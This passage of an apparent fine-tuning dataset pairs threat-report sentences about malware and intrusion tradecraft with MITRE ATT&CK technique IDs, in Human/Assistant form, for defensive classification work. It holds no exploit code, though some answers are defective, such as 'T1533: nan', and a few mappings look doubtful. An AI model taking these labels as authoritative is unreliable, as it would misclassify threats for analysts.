SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match .### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trojan.Karagany has used plugins with a self-delete capability.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Configuration Decryption: Another small, but same important function in the photo above, is the function for decrypting the data containing the C&C configuration### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SEASHARPEE is a Web shell.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has used SniffPass to collect credentials by sniffing network traffic.### Assistant: T1040: Network Sniffing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email web bugs/web beacons.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,C:\Windows\System32\sethc.exe ### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,H1N1 uses a custom packing algorithm.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has collected emails from victim Microsoft Exchange servers.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VBShower has the ability to execute VBScript files.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Deep Panda has used the sticky-keys technique to bypass the RDP login screen on remote systems during intrusions.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT relies on users to download and execute malicious Docker images.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Helminth establishes persistence by creating a shortcut.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Meanwhile, injection and delivery techniques are undergoing changes in 2018 with reflective loaders and code enhancements### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also abuse at to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group has also used quser.exe to identify existing RDP sessions on a victim.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can use a timer to delay execution of core functionality.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ROKRAT retrieves additional malicious payloads from the C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM has exfiltrated stolen data to Dropbox.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may acquire information about vulnerabilities that can be used during targeting.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has used netstat -ano to determine network connection information.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BendyBear can load and execute modules and Windows Application Programming calls using standard shellcode API hashing.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has enumerated sessions and users on a remote host, and identified privileged users logged into a targeted system.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Like many threat groups, TG-3390 conducts strategic web compromises (SWCs), also known as watering hole attacks, on websites associated with the target organization's vertical or demographic to increase the likelihood of finding victims with relevant information### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FlawedAmmyy leverages WMI to enumerate anti-virus on the victim.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SDBbot has the ability to use RDP to connect to victim's machines.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShadowPad communicates over HTTP to retrieve a string that is decoded into a C2 server URL.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has communicated with a C2 via an encrypted RC4 byte stream and AES-CBC.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum's loader can decrypt the backdoor code, embedded within the loader or within a legitimate PNG file.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can be launched by using DLL search order hijacking in which the wrapper DLL is placed in the same folder as explorer.exe and loaded during startup into the Windows Explorer process instead of the legitimate library.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM has used search order hijacking to force TeamViewer to load a malicious DLL.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak searches recursively for Outlook personal storage tables files within user directories and sends them back to the C2 server.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EVILNUM can obtain the username from the victim's machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TRITON was run as trilog.exe, a Py2EXE compiled python script that accepts a single IP address as a flag.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has enumerated hosts via Empire, gathering the username, domain name, machine name, and other system information.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SodaMaster can search a list of running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Aria-body has the ability to collect data from USB devices.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WellMail can archive files on the compromised host.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some Volgmer variants also install .dll files as services with names generated by a list of hard-coded strings.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KEYMARBLE has the capability to collect the computer name, language settings, the OS version, CPU information, disk devices, and time elapsed since system start.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET adds malicious code to a host's Xcode projects by enumerating CocoaPods target_integrator.rb files under the /Library/Ruby/Gems folder or enumerates all .xcodeproj folders under a given directory.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has set up Facebook pages in tandem with fake websites.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The code will gather the information and format the list using the following HTML to create a table: …
TypeOwnerPermissionsCreatedModificatedSizePath
[fileType][fileOwnerAccountName][number filePosixPermissions][fileCreationDate][fileModificationDate][fileSize][file path?]
Table 1 Commands available within XAgent OSX The ‘showBackupIosFolder’ command is rather interesting, as it allows the threat actors to determine if a compromised system was used to backup an IOS device, such as an iPhone or iPad### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Caterpillar WebShell has a module to gather information from the compromrised asset, including the computer version, computer name, IIS version, and more.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Felismus collects the victim LAN IP address and sends it to the C2 server.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also opt to encrypt and/or obfuscate these alternate channels.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In order to extend the lifespan of the domains in case one or more are blacklisted, there are twelve different C2 domains that xparis() can be set to### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SDBbot has the ability to use the command shell to execute commands on a compromised host.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Upon authentication attempts, the inserted code will first check to see if the user input is the password.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leafminer obfuscated scripts that were used on victim machines.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NotPetya can use wmic to help propagate itself across a network.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,All zero-day exploits known, or suspected, to have been used by this group are for vulnerabilities in Internet Explorer and Flash### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot injects into the svchost.exe process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Password policies are a way to enforce complex passwords that are difficult to guess or crack through Brute Force.### Assistant: T1201: Password Policy Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Felismus has masqueraded as legitimate Adobe Content Management System files.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Siloscape checks for Kubernetes node permissions.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldenSpy has exfiltrated host environment information to an external C2 domain via port 9006.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 3: ALFA TEaM Shell v2-Fake Mail (Default) Figure 4 shows an example email containing the default values the shell### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HELLOKITTY can use WMI to delete volume shadow copies.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot has the ability to copy itself to a hidden file and directory.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proton persists via Launch Agent.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NavRAT then creates a registry key in order to execute this file copy at the next reboot of the system, an initial method of persistence### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,hcdLoader installs itself as a service for persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook contains keylogging capabilities.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KeyBoy uses VBS scripts for installing files and performing execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Windows command shell is the primary command prompt on Windows systems.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar finds a specified directory, lists the files and metadata about those files.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, VALUEVAULT will call Windows PowerShell to extract browser history in order to match browser passwords with visited sites.### Assistant: T1533: nan" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Webshell has the ability to copy files on a compromised host.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HTTPBrowser's code may be obfuscated through structured exception handling and return-oriented programming.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Smoke Loader launches a scheduled task.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Lazarus Group malware sample performs reflective DLL injection.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exaramel for Windows automatically encrypts files before sending them to the C2 server.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Spark has run the whoami command and has a built-in command to identify the user logged in.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed can collect data on a compromised host.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The malware basically provides a remote CMD/PowerShell terminal for the attackers, enabling them to execute any scripts/commands and receive the result via HTTP requests### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkComet can collect the computer name, RAM used, and operating system version from the victim’s machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The infection could continue to spread via the newly infected file when it is executed by a remote system.### Assistant: T1080: Taint Shared Content" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,T9000 performs checks for various antivirus and security products during installation.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT has used a custom encryption scheme for communication between scripts and pyminifier to obfuscate scripts.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has spawned a new cmd.exe process to execute commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore can install malicious browser extensions that are used to hijack user searches.### Assistant: T1176: Browser Extensions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShimRat has been delivered as a package that includes compressed DLL and shellcode payloads within a .dat file.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOTHFULMEDIA has enumerated processes by ID, name, or privileges.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FLASHFLOOD achieves persistence by making an entry in the Registry's Run key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PipeMon can switch to an alternate C2 domain when a particular date has been reached.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Strider has used a hidden file system that is stored as a file on disk.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may exploit software vulnerabilities in client applications to execute code.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The run command (1) creates the process cmd.exe /c with the command parameters appended and will write the output of the command in hexadecimal format to the file %APPDATA%\tmpCa.vbs### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The majority of delivery documents contain a generic lure image requesting the victim enable macros with no additional content, the adversaries seemingly relying solely on lure filenames to entice victims to launch the malicious document### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang has used the right-to-left override character in spearphishing attachment names to trick targets into executing .scr and .exe files.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may compromise third-party DNS servers that can be used during targeting.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious rules will execute when an adversary sends a specifically crafted email to the user.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackdoorDiplomacy has obfuscated tools and malware it uses with VMProtect.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has used SSL to connect to C2 servers.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoisonIvy creates a backdoor through which remote attackers can upload files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADCALL collects the network adapter information.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor's Blowfish key is encrypted with a public RSA key.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT has used encryption and base64 to obfuscate its orchestrator code in the Registry.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages.### Assistant: T1602: Data from Configuration Repository" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bytes are rotated by four positions and XOR'ed with 0x23.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The information discovered may help the adversary conduct SID-History Injection, Pass the Ticket, and Kerberoasting.### Assistant: T1482: Domain Trust Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 executed shellcode to collect the username on the victim's machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RATANKBA uses tasklist /svc to display running tasks.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\, and it must be protected by Windows File or Resource Protection .### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike has the ability to accept a value for HTTP Host Header to enable domain fronting.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wingbird exploits CVE-2016-4117 to allow an executable to gain escalated privileges.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as OS Credential Dumping or password reuse, allowing access to privileged resources of the domain.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbon establishes persistence by creating a service and naming it based off the operating system version running on the current machine.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkComet can disable Security Center functions like anti-virus.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used VBScript files to execute its POWERSTATS payload, as well as macros.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has exploited known vulnerabilities in Fortinet, PulseSecure, and Palo Alto VPN appliances.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Egregor has used tools to gather information about users.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access.### Assistant: T1200: Hardware Additions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ABK has the ability to use cmd to run a Portable Executable on the compromised host.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When the operating system is patched in storage, this can be achieved in either the resident storage or via TFTP Boot.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GuLoader has relied upon users clicking on links to malicious documents.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 leverages valid accounts after gaining credentials for use within the victim domain.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location .### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches.### Assistant: T1597: Search Closed Sources" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Get2 has the ability to run executables with command-line arguments.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeus Panda also encrypts all configuration and settings in AES and RC4.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has been observed turning off Windows Security Center.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Linux and macOS implementations of SMB typically use Samba.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The LNK file is finally used to identify a third file: a ZIP file### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EVILNUM can run a remote scriptlet that drops a file and executes it via regsvr32.exe.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows services will have a service name as well as a display name.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has been seen changing malicious files to appear legitimate.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell has a command to clear system event logs.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leafminer scanned network services to search for vulnerabilities in the victim system.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,application shim### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are often remote service gateways that manage connections and credential authentication for these services.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can upload files to the victim's machine for operations.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WastedLocker created and established a service that runs until the encryption process is complete.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ROKRAT steals credentials by leveraging the Windows Vault mechanism.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This suggests that other WMI-based VM detection techniques may also detect certain physical systems if those systems do not support the specific WMI query### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 obtained a list of users and their roles from an Exchange server using Get-ManagementRoleAssignment.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla surveys a system upon check-in to discover running services and associated processes using the tasklist /svc command.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In such cases, the user's web browser is typically targeted for exploitation , but adversaries may also set up websites for non-exploitation behavior such as Application Access Token.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 4 x_mode command and new line delimited settings As seen in Figure 4, the settings are stored in variables seen in Table 6, which are used to authenticate to the actor-controlled Google account before uploading and downloading files from Google Drive### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FELIXROOT collects the username from the victim’s machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerShower has added a registry key so future powershell.exe instances are spawned with coordinates for a window position off-screen by default.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can use a number of known techniques to bypass Windows UAC.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Micropsia takes screenshots every 90 seconds by calling the Gdi32.BitBlt API.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanoCore creates a RunOnce key in the Registry to execute its VBS scripts each time the user logs on to the machine.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BendyBear has the ability to determine local time on a compromised host.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It then calls the subfunction with the argument of 2 to get the string that it will use as the HTTP POST request### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the Launch Daemon configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has used large file sizes to avoid detection.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BISCUIT has a command to launch a command shell on the system.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has used Systeminfo to gather system information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The ""SCOUT"" variant of NETEAGLE achieves persistence by adding itself to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Registry key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can launch cmd.exe to perform reconnaissance commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerStallion uses a XOR cipher to encrypt command output written to its OneDrive C2 server.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 actors use NBTscan to discover vulnerable systems.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Denis used the IsDebuggerPresent, OutputDebugString, and SetLastError APIs to avoid debugging.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Brave Prince collects hard drive content and system configuration information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FatDuke can decrypt AES encrypted C2 communications.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Derusbi obfuscates C2 traffic with variable 4-byte XOR keys.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CHOPSTICK includes runtime checks to identify an analysis environment and prevent execution on it.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once loaded into memory, MESSAGETAP deletes the keyword_parm.txt and parm.txt configuration files from disk.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Bazar loader is used to download and execute the Bazar backdoor.### Assistant: T1104: Multi-Stage Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This tactic uses public web services to host content that contains encoded commands that are decoded by the malware### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record or partition table.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device.### Assistant: T1599: Network Boundary Bridging" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT was distributed via malicious Word documents.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CosmicDuke collects LSA secrets.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used domain credentials, including domain admin, for lateral movement and privilege escalation.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A new child process is created as “ tg ​ yt ​ ut ​ rc ​ ( ID) ​ .e ​ xe - i SM- tgytutrc ”, which is used to encrypt a single file on the drive### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Obfuscation While the downloader module is not packed, the backdoor is packed with a modified version of UPX### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This EWM is intended to store data specific to that window and has specific application programming interface functions to set and get its value.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It handles XML formatted project files that define requirements for loading and building various platforms and configurations.### Assistant: T1127: Trusted Developer Utilities Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAFNIUM has obtained IP addresses for publicly-accessible Exchange servers.### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LockerGoga has been observed shutting down infected systems.### Assistant: T1529: System Shutdown/Reboot" "### Human:Find the techniques and ID from MITRE ATT&CK 